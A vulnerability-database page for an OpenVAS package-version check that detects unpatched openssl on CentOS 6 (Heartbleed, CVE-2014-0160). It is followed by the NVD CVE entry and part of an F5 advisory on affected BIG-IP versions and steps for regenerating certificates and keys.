Search...

CentOS Update for openssl CESA-2014:0376 centos6

2014-04-08T00:00:00

ID OPENVAS:1361412562310881918
Type openvas
Reporter Copyright (C) 2014 Greenbone Networks GmbH
Modified 2019-03-15T00:00:00

Description

The remote host is missing an update for the

                                        
                                            ###############################################################################
# OpenVAS Vulnerability Test
#
# CentOS Update for openssl CESA-2014:0376 centos6
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.881918");
  script_version("$Revision: 14222 $");
  script_tag(name:"last_modification", value:"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $");
  script_tag(name:"creation_date", value:"2014-04-08 11:30:13 +0530 (Tue, 08 Apr 2014)");
  script_cve_id("CVE-2014-0160");
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_name("CentOS Update for openssl CESA-2014:0376 centos6");

  script_tag(name:"affected", value:"openssl on CentOS 6");
  script_tag(name:"insight", value:"OpenSSL is a toolkit that implements the Secure Sockets Layer
(SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a
full-strength, general purpose cryptography library.

An information disclosure flaw was found in the way OpenSSL handled TLS and
DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server
could send a specially crafted TLS or DTLS Heartbeat packet to disclose a
limited portion of memory per request from a connected client or server.
Note that the disclosed portions of memory could potentially include
sensitive information such as private keys. (CVE-2014-0160)

Red Hat would like to thank the OpenSSL project for reporting this issue.
Upstream acknowledges Neel Mehta of Google Security as the original
reporter.

All OpenSSL users are advised to upgrade to these updated packages, which
contain a backported patch to correct this issue. For the update to take
effect, all services linked to the OpenSSL library (such as httpd and other
SSL-enabled services) must be restarted or the system rebooted.");
  script_tag(name:"solution", value:"Please install the updated packages.");
  script_tag(name:"qod_type", value:"package");
  script_tag(name:"solution_type", value:"VendorFix");
  script_xref(name:"CESA", value:"2014:0376");
  script_xref(name:"URL", value:"http://lists.centos.org/pipermail/centos-announce/2014-April/020249.html");
  script_tag(name:"summary", value:"The remote host is missing an update for the 'openssl'
  package(s) announced via the referenced advisory.");
  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (C) 2014 Greenbone Networks GmbH");
  script_family("CentOS Local Security Checks");
  script_dependencies("gather-package-list.nasl");
  script_mandatory_keys("ssh/login/centos", "ssh/login/rpms", re:"ssh/login/release=CentOS6");
  exit(0);
}

include("revisions-lib.inc");
include("pkg-lib-rpm.inc");

release = rpm_get_ssh_release();
if(!release)
  exit(0);

res = "";

if(release == "CentOS6")
{

  if ((res = isrpmvuln(pkg:"openssl", rpm:"openssl~1.0.1e~16.el6_5.7", rls:"CentOS6")) != NULL)
  {
    security_message(data:res);
    exit(0);
  }

  if ((res = isrpmvuln(pkg:"openssl-devel", rpm:"openssl-devel~1.0.1e~16.el6_5.7", rls:"CentOS6")) != NULL)
  {
    security_message(data:res);
    exit(0);
  }

  if ((res = isrpmvuln(pkg:"openssl-perl", rpm:"openssl-perl~1.0.1e~16.el6_5.7", rls:"CentOS6")) != NULL)
  {
    security_message(data:res);
    exit(0);
  }

  if ((res = isrpmvuln(pkg:"openssl-static", rpm:"openssl-static~1.0.1e~16.el6_5.7", rls:"CentOS6")) != NULL)
  {
    security_message(data:res);
    exit(0);
  }

  if (__pkg_match) exit(99);
  exit(0);
}

JSON Vulners Source

Initial Source

{"id": "OPENVAS:1361412562310881918", "type": "openvas", "bulletinFamily": "scanner", "title": "CentOS Update for openssl CESA-2014:0376 centos6", "description": "The remote host is missing an update for the ", "published": "2014-04-08T00:00:00", "modified": "2019-03-15T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881918", "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "references": ["2014:0376", "http://lists.centos.org/pipermail/centos-announce/2014-April/020249.html"], "cvelist": ["CVE-2014-0160"], "lastseen": "2019-05-29T18:37:44", "viewCount": 119, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-0160", "CVE-2014-0376"]}, {"type": "f5", "idList": ["SOL15159", "F5:K15159"]}, {"type": "attackerkb", "idList": ["AKB:D165638B-97C5-4C99-BFA0-70576DB52324"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:51A1D2F1D196381CC46CAE44EB5F5940"]}, {"type": "kitploit", "idList": ["KITPLOIT:7942195329946074809", "KITPLOIT:8661324951126484733", "KITPLOIT:8800200070735873517"]}, {"type": "citrix", "idList": ["CTX140605"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30475", "SECURITYVULNS:DOC:30508", "SECURITYVULNS:DOC:30506", "SECURITYVULNS:DOC:30522", "SECURITYVULNS:DOC:30472", "SECURITYVULNS:DOC:30476", "SECURITYVULNS:DOC:30479", "SECURITYVULNS:DOC:30496", "SECURITYVULNS:DOC:30509", "SECURITYVULNS:DOC:30526"]}, {"type": "hackerone", "idList": ["H1:6626", "H1:6475", "H1:44294", "H1:32570"]}, {"type": "nmap", "idList": ["NMAP:SSL-HEARTBLEED.NSE"]}, {"type": "seebug", "idList": ["SSV:62199", "SSV:86061", "SSV:62244", "SSV:62192", "SSV:62186", "SSV:62245", "SSV:86019", "SSV:62239", "SSV:62197", "SSV:62181"]}, {"type": "vulnerlab", "idList": ["VULNERLAB:1254"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:596E856FF8E5B47CBB4EE985B0B99685", "EXPLOITPACK:1020403320036D688D074B47660E9F50", "EXPLOITPACK:BBA53240047E43646B744C9628FA5EFD"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:AC8C8799BB0970C229AB0C432EECB10A"]}, {"type": "thn", "idList": ["THN:4868B616BCBA555DA2446F6F0EA837B0", "THN:3E9A13AAEA7FDC38D7BD8A148F19663D", "THN:0F7112302CBABF46D19CACCCFA6103C5"]}, {"type": "zdt", "idList": ["1337DAY-ID-22122", "1337DAY-ID-22129", "1337DAY-ID-22118"]}, {"type": "nessus", "idList": ["BLUECOAT_PROXY_AV_3_5_1_9.NASL", "MCAFEE_WEB_GATEWAY_SB10071.NASL", "SL_20140408_OPENSSL_ON_SL6_X.NASL", "REDHAT-RHSA-2014-0378.NASL", "FEDORA_2014-5337.NASL", "STUNNEL_5_01.NASL", "FEDORA_2014-4999.NASL", "ORACLELINUX_ELSA-2014-0376.NASL", "OPENSUSE-2014-318.NASL", "BLACKBERRY_ES_UDS_KB35882.NASL"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20140417-HEARTBLEED"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105040", "OPENVAS:871154", "OPENVAS:881918", "OPENVAS:1361412562310105010", "OPENVAS:1361412562310123430"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2896-1:7AEC1"]}, {"type": "symantec", "idList": ["SMNTC-1364"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:151177", "PACKETSTORM:126072", "PACKETSTORM:126288", "PACKETSTORM:126101"]}, {"type": "atlassian", "idList": ["ATLASSIAN:JRASERVER-38927", "ATLASSIAN:JRACLOUD-38927"]}, {"type": "ics", "idList": ["ICSA-14-128-01", "ICSA-14-135-04", "ICSA-14-114-01"]}, {"type": "threatpost", "idList": ["THREATPOST:15624C23F5CD5AC1029501D08A99D294"]}, {"type": "redhat", "idList": ["RHSA-2014:0396", "RHSA-2014:0376"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2014:0492-1"]}, {"type": "hp", "idList": ["HP:C04262670"]}, {"type": "cisco", "idList": ["CISCO-SA-20140408-CVE-2014-0160"]}, {"type": "freebsd", "idList": ["5631AE98-BE9E-11E3-B5E3-C80AA9043978"]}, {"type": "cert", "idList": ["VU:720951"]}, {"type": "oraclelinux", "idList": ["ELSA-2014-0376"]}], "modified": "2019-05-29T18:37:44", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2019-05-29T18:37:44", "rev": 2}, "vulnersScore": 5.9}, "pluginID": "1361412562310881918", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for openssl CESA-2014:0376 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881918\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-08 11:30:13 +0530 (Tue, 08 Apr 2014)\");\n script_cve_id(\"CVE-2014-0160\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"CentOS Update for openssl CESA-2014:0376 centos6\");\n\n script_tag(name:\"affected\", value:\"openssl on CentOS 6\");\n script_tag(name:\"insight\", value:\"OpenSSL is a toolkit that implements the Secure Sockets Layer\n(SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"CESA\", value:\"2014:0376\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2014-April/020249.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssl'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1e~16.el6_5.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~1.0.1e~16.el6_5.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-perl\", rpm:\"openssl-perl~1.0.1e~16.el6_5.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-static\", rpm:\"openssl-static~1.0.1e~16.el6_5.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "naslFamily": "CentOS Local Security Checks"}

{"cve": [{"lastseen": "2020-12-09T19:58:19", "description": "The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.\nCVSS V2 scoring evaluates the impact of the vulnerability on the host where the vulnerability is located. When evaluating the impact of this vulnerability to your organization, take into account the nature of the data that is being protected and act according to your organization\u2019s risk acceptance. While CVE-2014-0160 does not allow unrestricted access to memory on the targeted host, a successful exploit does leak information from memory locations which have the potential to contain particularly sensitive information, e.g., cryptographic keys and passwords. Theft of this information could enable other attacks on the information system, the impact of which would depend on the sensitivity of the data and functions of that system.", "edition": 13, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2014-04-07T22:55:00", "title": "CVE-2014-0160", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0160"], "modified": "2020-07-28T17:11:00", "cpe": ["cpe:/a:mitel:micollab:7.2", "cpe:/o:debian:debian_linux:6.0", "cpe:/a:mitel:mivoice:1.1.2.5", "cpe:/o:siemens:simatic_s7-1500_firmware:1.5", "cpe:/o:intellian:v100_firmware:1.21", "cpe:/a:mitel:mivoice:1.1.3.3", "cpe:/o:fedoraproject:fedora:19", "cpe:/o:redhat:enterprise_linux_server_eus:6.5", "cpe:/a:mitel:micollab:7.3", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:redhat:virtualization:6.0", "cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/a:redhat:gluster_storage:2.1", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:siemens:simatic_s7-1500t_firmware:1.5", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:13.10", "cpe:/o:intellian:v100_firmware:1.20", "cpe:/a:mitel:mivoice:1.4.0.102", "cpe:/a:mitel:mivoice:1.3.2.2", "cpe:/o:siemens:application_processing_engine_firmware:2.0", "cpe:/a:siemens:wincc_open_architecture:3.12", "cpe:/a:mitel:mivoice:1.2.0.11", "cpe:/o:siemens:cp_1543-1_firmware:1.1", "cpe:/o:canonical:ubuntu_linux:12.10", "cpe:/o:redhat:enterprise_linux_server_aus:6.5", "cpe:/o:fedoraproject:fedora:20", "cpe:/o:intellian:v100_firmware:1.24", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/a:mitel:micollab:7.0", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:redhat:enterprise_linux_server_tus:6.5", "cpe:/a:mitel:micollab:6.0", "cpe:/a:mitel:micollab:7.1", "cpe:/o:intellian:v60_firmware:1.15", "cpe:/a:redhat:storage:2.1", "cpe:/a:mitel:micollab:7.3.0.104", "cpe:/o:intellian:v60_firmware:1.25", "cpe:/o:opensuse:opensuse:12.3"], "id": "CVE-2014-0160", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:redhat:virtualization:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:19:*:*:*:*:*:*:*", "cpe:2.3:o:intellian:v60_firmware:1.15:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:12.3:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:20:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:micollab:7.3:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:intellian:v100_firmware:1.20:*:*:*:*:*:*:*", "cpe:2.3:o:siemens:application_processing_engine_firmware:2.0:*:*:*:*:*:*:*", "cpe:2.3:o:siemens:simatic_s7-1500_firmware:1.5:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:mivoice:1.2.0.11:*:*:*:*:skype_for_business:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:6.5:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:mivoice:1.3.2.2:*:*:*:*:skype_for_business:*:*", "cpe:2.3:a:mitel:micollab:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:mivoice:1.1.2.5:*:*:*:*:lync:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:intellian:v100_firmware:1.21:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:micollab:7.3.0.104:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:mivoice:1.4.0.102:*:*:*:*:skype_for_business:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:13.10:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:gluster_storage:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:wincc_open_architecture:3.12:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.10:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:micollab:7.1:*:*:*:*:*:*:*", "cpe:2.3:o:siemens:cp_1543-1_firmware:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:storage:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:mivoice:1.1.3.3:*:*:*:*:skype_for_business:*:*", "cpe:2.3:a:mitel:micollab:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:6.5:*:*:*:*:*:*:*", "cpe:2.3:o:intellian:v60_firmware:1.25:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:micollab:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:6.5:*:*:*:*:*:*:*", "cpe:2.3:o:siemens:simatic_s7-1500t_firmware:1.5:*:*:*:*:*:*:*", "cpe:2.3:o:intellian:v100_firmware:1.24:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2020-04-06T22:39:36", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\nF5 Product Development has assigned ID 456033 (BIG-IP), ID 456302 (BIG-IP Edge Client for Windows, Mac OS, and Linux), ID 456345 (BIG-IP Edge Client for Apple iOS), and ID 468659 (Enterprise Manager) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H456276 on the **Diagnostics** > **Identified** > **High** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP AAM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.4.0 - 11.4.1 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP AFM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.3.0 - 11.4.1 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP Analytics | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP APM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP ASM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP Edge Gateway | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | None \nBIG-IP GTM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP Link Controller | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP PEM | 11.5.0 - 11.5.1 | 11.3.0 - 11.4.1 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | None \nBIG-IP WebAccelerator | None | 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4 | None \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4 | None \nARX | None | 6.0.0 - 6.4.0 | None \nEnterprise Manager | 3.1.1 HF1 - HF2 | 3.0.0 - 3.1.1 \n2.1.0 - 2.3.0 | big3d \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | None \nBIG-IQ Cloud | None | 4.0.0 - 4.3.0 | None \nBIG-IQ Device | None | 4.2.0 - 4.3.0 | None \nBIG-IQ Security | None | 4.0.0 - 4.3.0 | None \nFirePass Clients | None | 5520-6032 | None \nBIG-IP Edge Portal for iOS | None | 1.0.0 - 1.0.3 | None \nBIG-IP Edge Portal for Android | None | 1.0.0 - 1.0.2 | None \nBIG-IP Edge Clients for Android | None | 2.0.3 - 2.0.4 | None \nBIG-IP Edge Clients for Apple iOS | 2.0.0 - 2.0.1 \n1.0.5 - 1.0.6 | 2.0.2 \n1.0.0 - 1.0.4 | VPN \nBIG-IP Edge Clients for Linux | 7080.* - 7080.2014.408.* \n7090.* - 7090.2014.407.* \n7091.* - 7091.2014.408.* \n7100.* - 7100.2014.408.* \n7101.* - 7101.2014.407.* | 6035 - 7071 \n7080.2014.409.* \n7090.2014.408.* \n7091.2014.409.* \n7100.2014.409.* (11.5.0 HF3) \n7101.2014.408.* (11.5.1 HF2) | VPN \nBIG-IP Edge Clients for MAC OS X | 7080.* - 7080.2014.408.* \n7090.* - 7090.2014.407.* \n7091.* - 7091.2014.408.* \n7100.* - 7100.2014.408.* \n7101.* - 7101.2014.407.* | 6035 - 7071 \n7080.2014.409.* \n7090.2014.408.* \n7091.2014.409.* \n7100.2014.409.* (11.5.0 HF3) \n7101.2014.408.* (11.5.1 HF2) | VPN \nBIG-IP Edge Clients for Windows | 7080.* - 7080.2014.408.* \n7090.* - 7090.2014.407.* \n7091.* - 7091.2014.408.* \n7100.* - 7100.2014.408.* \n7101.* - 7101.2014.407.* | 6035 - 7071 \n7080.2014.409.* \n7090.2014.408.* \n7091.2014.409.* \n7100.2014.409.* (11.5.0 HF3) \n7101.2014.408.* (11.5.1 HF2) | VPN \nLineRate | None | 2.2.0 | None \n \n**Important**: For the hotfixes noted previously, the included version of OpenSSL has not been changed. F5 has patched the existing version of OpenSSL to resolve this vulnerability. As a result, on a patched BIG-IP system, the OpenSSL version is still OpenSSL 1.0.1e-fips. For more information about installed hotfix versions, refer to [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>).\n\nBIG-IP Edge Client fixes\n\nThis issue has been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in BIG-IP APM 11.5.1 HF2 and 11.5.0 HF3. This issue has also been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in an engineering hotfix in other BIG-IP APM versions. You can obtain the engineering hotfix by contacting [F5 Technical Support](<http:// http://www.f5.com/training-support/customer-support/contact/>) and referencing this article number and the associated ID number. Note that engineering hotfixes are intended to resolve a specific software issue until a suitable minor release, maintenance release, or cumulative hotfix rollup release is available that includes the software fix. For more information, refer to [K8986: F5 software lifecycle policy](<https://support.f5.com/csp/article/K8986>).\n\nYou can eliminate this vulnerability by running a version listed in the **Versions known to be not vulnerable** column. If the **Versions known to be not vulnerable** column does not list a version that is higher than the version you are running, then no upgrade candidate currently exists.\n\nUpgrading to a version known to be not vulnerable, or taking steps to mitigate this vulnerability, does not eliminate possible damage that may have already occurred as a result of this vulnerability. After upgrading to a version that is known to be not vulnerable, consider the following components that may have been compromised by this vulnerability:\n\nSSL profile certificate/key pairs\n\nThe BIG-IP SSL profiles may reference SSL certificate/key pairs that were compromised. For information about creating new SSL certificate/key pairs for SSL profiles, refer to the following articles:\n\n * [K14620: Managing SSL certificates for BIG-IP systems using the Configuration utility](<https://support.f5.com/csp/article/K14620>)\n * [K14534: Creating SSL certificates and keys with OpenSSL (11.x - 14.x)](<https://support.f5.com/csp/article/K14534>)\n * [K13579: Generating new default certificate and key pairs for BIG-IP SSL profiles](<https://support.f5.com/csp/article/K13579>)\n\nBIG-IP device certificate/key pairs\n\nThe BIG-IP system may have a device certificate/key pair that was compromised. For information about creating new SSL certificate/key pairs, refer to the following articles:\n\n * [K9114: Creating a new SSL device certificate and key pair](<https://support.f5.com/csp/article/K9114>)\n * [K7754: Renewing self-signed device certificates](<https://support.f5.com/csp/article/K7754>)\n\n**Important**: After you generate a new device certificate and private key pair, you must re-establish device trusts. Additionally, the device certificates are used for GTM sync groups and Enterprise Manager monitoring. As a result, you must recreate the GTM sync groups and rediscover devices managed by Enterprise Manager.\n\nCMI certificate/key pairs\n\nThe BIG-IP system may have a centralized management infrastructure (CMI) certificate/key pair (used for device group communication and synchronization) that was compromised. To regenerate the CMI certificate/key pairs on devices in a device group, and rebuild the device trust, perform the following procedure:\n\n**Impact of procedure**: F5 recommends that you perform this procedure during a maintenance window. This procedure causes the current device to lose connectivity with all other BIG-IP devices. Depending on the device group and traffic group configuration, the connectivity loss may result in an unintentional active-active condition that causes a traffic disruption. To prevent a standby device from going active, set the standby device in the device group to **Force Offline** before performing the procedure. Standby devices that were set to **Force Offline** should be set to **Release Offline** after performing the procedure.\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **Device Management **> **Device Trust** > **Local Domain**.\n 3. Click **Reset Device Trust**.\n 4. Select the **Generate new self-signed authority** option.\n 5. Click **Update** (or **Next**).\n 6. Click **Finished**.\n\nRepeat this procedure for each device in the device group.\n\nAfter you complete the device trust reset on all devices, set up the device trust by performing the procedures described in the following articles:\n\n * [K13649: Creating a device group using the Configuration utility (11.x - 12.x)](<https://support.f5.com/csp/article/K13649>)\n * [K13639: Configuring a device group using tmsh](<https://support.f5.com/csp/article/K13639>)\n * [K13946: Troubleshooting ConfigSync and device service clustering issues (11.x - 13.x)](<https://support.f5.com/csp/article/K13946>)\n\nThe big3d process\n\nThe BIG-IP system may have a vulnerable version of the** big3d **process under the following conditions:\n\n * The BIG-IP GTM system is running 11.5.0 or 11.5.1.\n * The managed BIG-IP system is running a **big3d** process that was updated by an affected BIG-IP GTM system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. However, if a BIG-IP GTM system running 11.5.0 or 11.5.1 installs **big3d** 11.5.0 on the 